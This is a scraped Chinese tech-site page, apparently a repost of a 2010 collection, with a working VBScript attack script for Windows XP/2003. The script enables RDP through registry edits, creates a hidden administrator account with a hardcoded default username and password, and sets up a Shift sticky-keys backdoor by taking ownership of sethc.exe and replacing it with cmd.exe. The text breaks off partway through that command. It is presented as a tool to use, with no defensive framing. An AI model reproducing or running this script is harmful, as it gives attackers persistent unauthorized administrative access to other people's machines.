首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    vbs远程木马_vbs 访问webservice

    大家好,又见面了,我是你们的朋友全栈君。 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集 2010年12月07日   xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本   vbson error resume next   const HKEY_LOCAL_MACHINE = &H80000002   strComputer = “.”   Set StdOut = WScript.StdOut   Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_   strComputer & “\root\default:StdRegProv”)   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”   oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”   oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”   strValueName = “fDenyTSConnections”   dwValue = 0   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”   strValueName = “PortNumber”   dwValue = 3389   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”   strValueName = “PortNumber”   dwValue = 3389   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   on error resume next   dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath   On Error Resume Next   Dim obj, success   Set obj = CreateObject(“WScript.Shell”)   success = obj.run(“cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cm

    01
    领券